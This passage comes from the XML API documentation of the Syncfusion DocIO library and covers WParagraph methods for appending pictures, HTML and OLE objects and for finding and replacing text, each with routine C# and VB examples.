                paragraph.AppendCrossReference(ReferenceType.Bookmark, ReferenceKind.ContentText, items(0), True, False, False, String.Empty)
                'Update the document Fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendPicture(System.Drawing.Image)">
            <summary>
            Appends the specified image to the end of paragraph.
            </summary>
            <param name="image">The <see cref="T:System.Drawing.Image"/> to be added.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWPicture"/> instance that represents the newly added image.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
            <example>The following example illustrates how to append image to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add image to  the paragraph
                IWPicture picture = paragraph.AppendPicture(Image.FromFile("Image.png"));
                //Set height and width for the image
                picture.Height = 100;
                picture.Width = 100;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add image to  the paragraph
                Dim picture As IWPicture = paragraph.AppendPicture(Image.FromFile("Image.png"))
                'Set height and width for the image
                picture.Height = 100
                picture.Width = 100
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendHTML(System.String)">
            <summary>
            Appends the HTML text to the end of the paragraph.
            </summary>
            <param name="html">The <b>string</b> that specifies the HTML text.</param>
            <example>The following example illustrates how to append html text to the paragraph.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx");
                //Html string to be inserted
                string htmlstring = "<p><b>This text is inserted as HTML string.</b></p>";
                IWParagraph paragraph = document.Sections[0].Body.Paragraphs[0];
                //Append the Html string to first paragraph in the document
                paragraph.AppendHTML(htmlstring);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                Dim paragraph As IWParagraph = document.Sections(0).Body.Paragraphs(0)
                'Append the Html string to first paragraph in the document
                paragraph.AppendHTML(htmlstring)
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified path, picture and object type.
            </summary>
            <param name="pathToFile">The <b>string</b> specifying the path to file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>The following example illustrates how to append a OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                paragraph = sec.AddParagraph();
                paragraph.AppendOleObject(@"..\..\Data\Excel_Template.xlsx", picture, OleObjectType.ExcelWorksheet);
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                paragraph = sec.AddParagraph()
                paragraph.AppendOleObject("..\..\Data\Excel_Template.xlsx", picture, OleObjectType.ExcelWorksheet)
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Appends the OLE object to the paragraph with the specified path and picture.
            </summary>
            <param name="pathToFile">The <b>string</b> specifying the path to file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>The following example illustrates how to append a OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                WOleObject ole = paragraph.AppendOleObject(@"..\..\Data\Excel_Template.xlsx", picture);
                //Set how to display the Ole object
                ole.DisplayAsIcon = false;
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                Dim ole As WOleObject = paragraph.AppendOleObject("..\..\Data\Excel_Template.xlsx", picture)
                'Set how to display the Ole object
                ole.DisplayAsIcon = False
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified stream, picture and object type.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Open the file to be embedded
                FileStream stream = new FileStream("Book1.xlsx", FileMode.Open);
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append the Ole object to the paragraph
                WOleObject ole = paragraph.AppendOleObject(stream, picture, OleObjectType.ExcelWorksheet);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Open the file to be embedded
                Dim stream As New FileStream("Book1.xlsx", FileMode.Open)
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append the Ole object to the paragraph
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, OleObjectType.ExcelWorksheet)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array, picture and object type.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                paragraph = sec.AddParagraph();
                //Append OLE object
                paragraph.AppendOleObject(olebytes, picture, OleObjectType.ExcelWorksheet);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                paragraph = sec.AddParagraph()
                'Append OLE object
                paragraph.AppendOleObject(olebytes, picture, OleObjectType.ExcelWorksheet)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleLinkType)">
            <summary>
            Appends the OLE object to the paragraph with the specified stream, picture and file link type.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="oleLinkType">The <see cref="T:Syncfusion.DocIO.DLS.OleLinkType"/> member that specifies the link type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>The OLE object type must be explicitly specified when appending OLE objects using this method.</remarks> 
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                FileStream stream = new FileStream("Excel_Template.xlsx", FileMode.Open);
                WOleObject ole = paragraph.AppendOleObject(stream, picture, OleLinkType.Embed);
                ole.ObjectType = "Excel Worksheet";
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                Dim stream As New FileStream("Excel_Template.xlsx", FileMode.Open)
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, OleLinkType.Embed)
                ole.ObjectType = "Excel Worksheet"
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleLinkType)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array of the file, picture and link type.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="oleLinkType">The <see cref="T:Syncfusion.DocIO.DLS.OleLinkType"/> member that specifies the link type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>The OLE object type must be explicitly specified when appending OLE objects using this method.</remarks>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                WOleObject ole = paragraph.AppendOleObject(olebytes, picture, OleLinkType.Embed);
                ole.ObjectType = "Excel Worksheet";
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                Dim ole As WOleObject = paragraph.AppendOleObject(olebytes, picture, OleLinkType.Embed)
                ole.ObjectType = "Excel Worksheet"
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,System.String)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array of the file, picture and file extension.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="fileExtension">The <b>string</b> that specifies the file extension.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                paragraph = sec.AddParagraph();
                //Append OLE object
                paragraph.AppendOleObject(olebytes, picture, ".xlsx");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                paragraph = sec.AddParagraph()
                'Append OLE object
                paragraph.AppendOleObject(olebytes, picture, ".xlsx")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,System.String)">
            <summary>
            Appends the OLE object to the paragraph with the specified file stream, picture and file extension.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="fileExtension">The <b>string</b> that specifies the file extension.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Open the file to be embedded
                FileStream stream = new FileStream("Excel_Template.xlsx", FileMode.Open);
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append the Ole object to the paragraph
                WOleObject ole = paragraph.AppendOleObject(stream, picture, "xlsx");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Open the file to be embedded
                Dim stream As New FileStream("Excel_Template.xlsx", FileMode.Open)
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append the Ole object to the paragraph
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, "xlsx")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetOwnerEntity">
            <summary>
            Get the owner entity of the paragraph.
            </summary>
            <exclude/>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendFieldMark(Syncfusion.DocIO.DLS.FieldMarkType)">
            <summary>
            Appends the field mark.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendLineBreak(System.String)">
            <summary>
            Appends lineBreak
            </summary>
            <param name="lineBreakText">The line break text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendHyperlink(System.String,System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.HyperlinkType)">
            <summary>
            Appends the hyperlink.
            </summary>
            <param name="link">The link.</param>
            <param name="text">The text.</param>
            <param name="pict">The picture.</param>
            <param name="type">The type.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LoadPicture(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Loads the picture.
            </summary>
            <param name="picture">The picture.</param>
            <param name="imageRecord">The image record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendIndexEntry(System.String)">
            <summary>
            Appends the index entry.
            </summary>
            <param name="entryToMark">The entry to mark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendMergeField(System.String)">
            <summary>
            Append merge field
            </summary>
            <param name="fieldName"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetListFormat">
            <summary>
            Gets the list format.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetListLevel(Syncfusion.DocIO.DLS.WListFormat,System.Int32@)">
            <summary>
            Gets the list level.
            </summary>
            <param name="listFormat">The list format.</param>
            <param name="tabLevelIndex">The list style hierarchy index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetListText">
            <summary>
            Gets the list text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetListLevel(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets the list level.
            </summary>
            <param name="listFormat">The list format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetLeftMargindAndFirstLineIndent(Syncfusion.DocIO.DLS.WListFormat,Syncfusion.DocIO.DLS.WListLevel,Syncfusion.DocIO.DLS.WParagraphStyle)">
            <summary>
            Get the paragraph margin left and first line indent based on heirarchy
            </summary>
            <param name="listformat"></param>
            <param name="level"></param>
            <param name="parsStyle"></param>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.DocIO.DLS.WParagraph.IsZeroAutoLineSpace" -->
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Find(System.Text.RegularExpressions.Regex)">
            <summary>
            Returns first entry of the specified <see cref="T:System.Text.RegularExpressions.Regex"/> in the paragraph.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the paragraph.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                Find the first occurrence of a particular text in the paragraph
                TextSelection textSelection = paragraph.Find(new Regex("Panda"));
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of a particular text in the paragraph
                Dim textSelection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Returns first entry of given string in the paragraph, taking into consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> that specifies the text to find.
            </param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the paragraph.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                Find the first occurrence of a particular text in the paragraph
                TextSelection textSelection = paragraph.Find("panda", true, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of a particular text in the paragraph
                Dim textSelection As TextSelection = paragraph.Find("panda", true, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.Text.RegularExpressions.Regex,System.String)">
            <summary>
            Replaces all entries of the given <see cref="T:System.Text.RegularExpressions.Regex"/> with the replace string.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns> 
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Replace all occurrence of a particular text in the paragraph
                paragraph.Replace(new Regex("Paragraph"),"paragraph");            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Replace all occurrence of a particular text in the paragraph
                paragraph.Replace(New Regex("Paragraph"), "paragraph")
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.String,System.String,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the paragraph with replace string, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="replace">The <b>string</b> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Replace all occurrence of a particular text in the paragraph
                paragraph.Replace("Paragraph","paragraph", false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Replace all occurrence of a particular text in the paragraph
                paragraph.Replace("Paragraph", "paragraph", False, True)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.Replace(System.Text.RegularExpressions.Regex,Syncfusion.DocIO.DLS.TextSelection)">
            <summary>
            Replaces the specified regular expression with a <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> in the paragraph.
            </summary>
            <param name="pattern">The <see cref="T:System.Text.RegularExpressions.Regex"/> used to find the text.</param>
